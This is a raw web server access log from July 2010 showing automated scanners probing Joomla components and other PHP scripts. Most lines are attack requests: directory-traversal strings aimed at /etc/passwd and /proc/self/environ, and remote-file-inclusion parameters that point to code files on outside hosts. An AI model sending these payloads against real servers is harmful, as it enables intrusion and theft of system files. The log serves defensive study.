76.70.7.48 - - [27/Jul/2010:13:48:25 +0200] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.79"
76.70.7.48 - - [27/Jul/2010:13:48:25 +0200] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.79"
94.23.215.207 - - [27/Jul/2010:13:48:52 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:13:48:52 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:13:48:53 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:13:48:53 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:13:49:18 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:13:49:18 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:13:49:18 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:13:49:18 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
213.229.106.147 - - [27/Jul/2010:13:56:39 +0200] "GET //components/com_rwcards//errors.php?error=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-" "libwww-perl/5.805"
119.192.145.144 - - [27/Jul/2010:14:02:50 +0200] "GET //components/com_rwcards//errors.php?error=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-" "libwww-perl/5.805"
125.141.91.138 - - [27/Jul/2010:14:03:39 +0200] "GET //components/com_rwcards//errors.php?error=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-" "libwww-perl/5.805"
174.121.240.147 - - [27/Jul/2010:14:03:54 +0200] "GET /logs/access_log//////index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-" "libwww-perl/5.810"
174.121.240.147 - - [27/Jul/2010:14:03:54 +0200] "GET //////index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.810"
174.121.240.147 - - [27/Jul/2010:14:03:55 +0200] "GET /logs//////index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 305 "-" "libwww-perl/5.810"
72.55.153.180 - - [27/Jul/2010:14:12:27 +0200] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
72.55.153.180 - - [27/Jul/2010:14:12:29 +0200] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
72.55.153.180 - - [27/Jul/2010:14:12:39 +0200] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
69.65.25.2 - - [27/Jul/2010:14:14:00 +0200] "GET /logs/index.php?option=com_weberpcustomer&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 300 "-" "libwww-perl/5.831"
69.65.25.2 - - [27/Jul/2010:14:14:00 +0200] "GET /logs/index.php?option=com_weberpcustomer&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 300 "-" "libwww-perl/5.831"
69.65.25.2 - - [27/Jul/2010:14:14:00 +0200] "GET /logs/index.php?option=com_weberpcustomer&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 300 "-" "libwww-perl/5.831"
69.65.25.2 - - [27/Jul/2010:14:14:00 +0200] "GET /index.php?option=com_weberpcustomer&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 295 "-" "libwww-perl/5.831"
69.65.25.2 - - [27/Jul/2010:14:14:00 +0200] "GET /index.php?option=com_weberpcustomer&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 295 "-" "libwww-perl/5.831"
69.65.25.2 - - [27/Jul/2010:14:14:00 +0200] "GET /index.php?option=com_weberpcustomer&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 295 "-" "libwww-perl/5.831"
84.217.73.155 - - [27/Jul/2010:14:15:23 +0200] "GET /logs/index.php?option=com_weberpcustomer&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 300 "-" "libwww-perl/5.79"
84.217.73.155 - - [27/Jul/2010:14:15:24 +0200] "GET /index.php?option=com_weberpcustomer&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 295 "-" "libwww-perl/5.79"
65.13.185.104 - - [27/Jul/2010:14:15:32 +0200] "GET /logs/index.php?option=com_weberpcustomer&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
65.13.185.104 - - [27/Jul/2010:14:15:32 +0200] "GET /index.php?option=com_weberpcustomer&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
217.65.2.151 - - [27/Jul/2010:14:15:37 +0200] "GET /logs/index.php?option=com_weberpcustomer&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 300 "-" "libwww-perl/5.836"
217.65.2.151 - - [27/Jul/2010:14:15:37 +0200] "GET /index.php?option=com_weberpcustomer&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 295 "-" "libwww-perl/5.836"
217.65.2.151 - - [27/Jul/2010:14:15:50 +0200] "GET /index.php?option=com_weberpcustomer&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 295 "-" "libwww-perl/5.836"
84.217.73.155 - - [27/Jul/2010:14:15:56 +0200] "GET /index.php?option=com_weberpcustomer&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 295 "-" "libwww-perl/5.79"
212.52.166.12 - - [27/Jul/2010:14:16:02 +0200] "GET /index.php?option=com_weberpcustomer&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
72.55.153.180 - - [27/Jul/2010:14:16:07 +0200] "GET /logs/access_log/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.805"
72.55.153.180 - - [27/Jul/2010:14:16:07 +0200] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
72.55.153.180 - - [27/Jul/2010:14:16:07 +0200] "GET /logs/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
72.55.153.180 - - [27/Jul/2010:14:16:13 +0200] "GET /logs/access_log/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.805"
72.55.153.180 - - [27/Jul/2010:14:16:13 +0200] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
72.55.153.180 - - [27/Jul/2010:14:16:13 +0200] "GET /logs/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
72.55.153.180 - - [27/Jul/2010:14:16:18 +0200] "GET /logs/access_log/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.805"
72.55.153.180 - - [27/Jul/2010:14:16:18 +0200] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
72.55.153.180 - - [27/Jul/2010:14:16:18 +0200] "GET /logs/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
213.229.106.147 - - [27/Jul/2010:14:17:10 +0200] "GET /logs/error_log//components/com_rwcards//errors.php?error=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 336 "-" "libwww-perl/5.805"
213.229.106.147 - - [27/Jul/2010:14:17:10 +0200] "GET //components/com_rwcards//errors.php?error=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-" "libwww-perl/5.805"
213.229.106.147 - - [27/Jul/2010:14:17:10 +0200] "GET /logs//components/com_rwcards//errors.php?error=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 326 "-" "libwww-perl/5.805"
65.13.185.104 - - [27/Jul/2010:14:19:21 +0200] "GET /index.php?option=com_weberpcustomer&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
217.65.2.151 - - [27/Jul/2010:14:19:34 +0200] "GET /logs/access_log/index.php?option=com_weberpcustomer&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 311 "-" "libwww-perl/5.836"
217.65.2.151 - - [27/Jul/2010:14:19:35 +0200] "GET /index.php?option=com_weberpcustomer&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 295 "-" "libwww-perl/5.836"
217.65.2.151 - - [27/Jul/2010:14:19:35 +0200] "GET /logs/index.php?option=com_weberpcustomer&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 300 "-" "libwww-perl/5.836"
212.52.166.12 - - [27/Jul/2010:14:20:12 +0200] "GET /logs/access_log/index.php?option=com_weberpcustomer&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 311 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:14:20:13 +0200] "GET /index.php?option=com_weberpcustomer&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 295 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:14:20:13 +0200] "GET /logs/index.php?option=com_weberpcustomer&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 300 "-" "libwww-perl/5.803"
72.55.153.180 - - [27/Jul/2010:14:20:44 +0200] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
72.55.153.180 - - [27/Jul/2010:14:20:44 +0200] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
72.55.153.180 - - [27/Jul/2010:14:20:45 +0200] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
84.217.73.155 - - [27/Jul/2010:14:20:59 +0200] "GET /logs/access_log/index.php?option=com_weberpcustomer&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 311 "-" "libwww-perl/5.79"
84.217.73.155 - - [27/Jul/2010:14:21:00 +0200] "GET /index.php?option=com_weberpcustomer&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 295 "-" "libwww-perl/5.79"
84.217.73.155 - - [27/Jul/2010:14:21:00 +0200] "GET /logs/index.php?option=com_weberpcustomer&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 300 "-" "libwww-perl/5.79"
72.55.153.180 - - [27/Jul/2010:14:22:04 +0200] "GET /logs/access_log/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.805"
72.55.153.180 - - [27/Jul/2010:14:22:09 +0200] "GET /logs/access_log/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.805"
72.55.153.180 - - [27/Jul/2010:14:22:09 +0200] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
72.55.153.180 - - [27/Jul/2010:14:22:09 +0200] "GET /logs/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
72.55.153.180 - - [27/Jul/2010:14:22:09 +0200] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
72.55.153.180 - - [27/Jul/2010:14:22:10 +0200] "GET /logs/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
72.55.153.180 - - [27/Jul/2010:14:22:42 +0200] "GET /logs/access_log/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.805"
72.55.153.180 - - [27/Jul/2010:14:22:42 +0200] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
72.55.153.180 - - [27/Jul/2010:14:22:42 +0200] "GET /logs/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
65.13.185.104 - - [27/Jul/2010:14:24:18 +0200] "GET /logs/access_log/index.php?option=com_weberpcustomer&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 311 "-" "libwww-perl/5.805"
65.13.185.104 - - [27/Jul/2010:14:24:21 +0200] "GET /index.php?option=com_weberpcustomer&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
65.13.185.104 - - [27/Jul/2010:14:24:24 +0200] "GET /logs/index.php?option=com_weberpcustomer&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
207.46.13.87 - - [27/Jul/2010:14:28:49 +0200] "GET /robots.txt HTTP/1.1" 404 296 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
213.145.228.170 - - [27/Jul/2010:14:28:57 +0200] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.813"
207.46.13.87 - - [27/Jul/2010:14:29:33 +0200] "GET / HTTP/1.1" 200 559 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
217.65.2.151 - - [27/Jul/2010:14:30:30 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.836"
84.217.73.155 - - [27/Jul/2010:14:30:49 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.79"
84.217.73.155 - - [27/Jul/2010:14:30:56 +0200] "GET /skin/ggambo7002_board/comment_modify.php?dir=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 326 "-" "libwww-perl/5.79"
217.65.2.151 - - [27/Jul/2010:14:31:14 +0200] "GET /skin/ggambo7002_board/comment_modify.php?dir=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 326 "-" "libwww-perl/5.836"
94.23.215.207 - - [27/Jul/2010:14:32:26 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:14:32:26 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:14:32:30 +0200] "GET /logs/*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
94.23.215.207 - - [27/Jul/2010:14:32:30 +0200] "GET /*.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:14:33:50 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:14:33:51 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:14:33:51 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:14:33:52 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:14:33:53 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:14:33:53 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:14:33:55 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:14:33:55 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:14:33:55 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:14:34:01 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
213.145.228.170 - - [27/Jul/2010:14:36:51 +0200] "GET /logs/access_log/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.813"
213.145.228.170 - - [27/Jul/2010:14:36:51 +0200] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.813"
213.145.228.170 - - [27/Jul/2010:14:36:51 +0200] "GET /logs/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.813"
174.142.75.205 - - [27/Jul/2010:14:38:35 +0200] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 333 "-" "libwww-perl/5.805"
174.142.75.205 - - [27/Jul/2010:14:38:35 +0200] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 328 "-" "libwww-perl/5.805"
174.142.75.205 - - [27/Jul/2010:14:38:35 +0200] "GET /logs/access_log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 344 "-" "libwww-perl/5.805"
72.55.153.180 - - [27/Jul/2010:14:39:02 +0200] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
72.55.153.180 - - [27/Jul/2010:14:39:02 +0200] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
72.55.153.180 - - [27/Jul/2010:14:39:02 +0200] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
211.206.120.196 - - [27/Jul/2010:14:41:38 +0200] "POST /logs/pingserver.php HTTP/1.1" 404 305 "-" "plaNETWORK Bot Search"
211.206.120.196 - - [27/Jul/2010:14:41:38 +0200] "POST /pingserver.php HTTP/1.1" 404 300 "-" "plaNETWORK Bot Search"
211.206.120.196 - - [27/Jul/2010:14:41:39 +0200] "POST /logs/pingserver.php HTTP/1.1" 404 305 "-" "plaNETWORK Bot Search"
211.206.120.196 - - [27/Jul/2010:14:41:39 +0200] "POST /pingserver.php HTTP/1.1" 404 300 "-" "plaNETWORK Bot Search"
211.206.120.196 - - [27/Jul/2010:14:41:40 +0200] "POST /logs/pingserver.php HTTP/1.1" 404 305 "-" "plaNETWORK Bot Search"
211.206.120.196 - - [27/Jul/2010:14:41:40 +0200] "POST /pingserver.php HTTP/1.1" 404 300 "-" "plaNETWORK Bot Search"
211.206.120.196 - - [27/Jul/2010:14:41:41 +0200] "POST /logs/pingserver.php HTTP/1.1" 404 305 "-" "plaNETWORK Bot Search"
211.206.120.196 - - [27/Jul/2010:14:41:41 +0200] "POST /pingserver.php HTTP/1.1" 404 300 "-" "plaNETWORK Bot Search"
72.55.153.180 - - [27/Jul/2010:14:41:47 +0200] "GET /logs/access_log/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.805"
72.55.153.180 - - [27/Jul/2010:14:41:48 +0200] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
72.55.153.180 - - [27/Jul/2010:14:41:48 +0200] "GET /logs/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
72.55.153.180 - - [27/Jul/2010:14:41:50 +0200] "GET /logs/access_log/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.805"
72.55.153.180 - - [27/Jul/2010:14:41:50 +0200] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
72.55.153.180 - - [27/Jul/2010:14:41:51 +0200] "GET /logs/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
72.55.153.180 - - [27/Jul/2010:14:41:53 +0200] "GET /logs/access_log/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-" "libwww-perl/5.805"
72.55.153.180 - - [27/Jul/2010:14:41:53 +0200] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-" "libwww-perl/5.805"
72.55.153.180 - - [27/Jul/2010:14:41:53 +0200] "GET /logs/index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-" "libwww-perl/5.805"
119.192.145.144 - - [27/Jul/2010:14:49:05 +0200] "GET /logs/error_log//components/com_rwcards//errors.php?error=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 336 "-" "libwww-perl/5.805"
119.192.145.144 - - [27/Jul/2010:14:49:05 +0200] "GET //components/com_rwcards//errors.php?error=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-" "libwww-perl/5.805"
119.192.145.144 - - [27/Jul/2010:14:49:06 +0200] "GET /logs//components/com_rwcards//errors.php?error=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 326 "-" "libwww-perl/5.805"
125.141.91.138 - - [27/Jul/2010:14:53:09 +0200] "GET /logs/error_log//components/com_rwcards//errors.php?error=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 336 "-" "libwww-perl/5.805"
125.141.91.138 - - [27/Jul/2010:14:53:09 +0200] "GET //components/com_rwcards//errors.php?error=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-" "libwww-perl/5.805"
125.141.91.138 - - [27/Jul/2010:14:53:10 +0200] "GET /logs//components/com_rwcards//errors.php?error=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 326 "-" "libwww-perl/5.805"
217.65.2.151 - - [27/Jul/2010:14:55:30 +0200] "GET /logs/access_log//index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 312 "-" "libwww-perl/5.836"
217.65.2.151 - - [27/Jul/2010:14:55:30 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.836"
217.65.2.151 - - [27/Jul/2010:14:55:30 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 301 "-" "libwww-perl/5.836"
217.65.2.151 - - [27/Jul/2010:15:04:12 +0200] "GET /logs/access_log/skin/ggambo7002_board/comment_modify.php?dir=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 342 "-" "libwww-perl/5.836"
217.65.2.151 - - [27/Jul/2010:15:04:12 +0200] "GET /skin/ggambo7002_board/comment_modify.php?dir=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 326 "-" "libwww-perl/5.836"
217.65.2.151 - - [27/Jul/2010:15:04:13 +0200] "GET /logs/skin/ggambo7002_board/comment_modify.php?dir=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 331 "-" "libwww-perl/5.836"
212.52.166.12 - - [27/Jul/2010:15:05:12 +0200] "GET /logs/access_log//index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 312 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:15:05:12 +0200] "GET /logs/access_log//index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 312 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:15:05:13 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:15:05:13 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:15:05:13 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 301 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:15:05:13 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 301 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:15:06:34 +0200] "GET /logs/access_log//index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 312 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:15:06:34 +0200] "GET //index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.803"
212.52.166.12 - - [27/Jul/2010:15:06:35 +0200] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 301 "-" "libwww-perl/5.803"
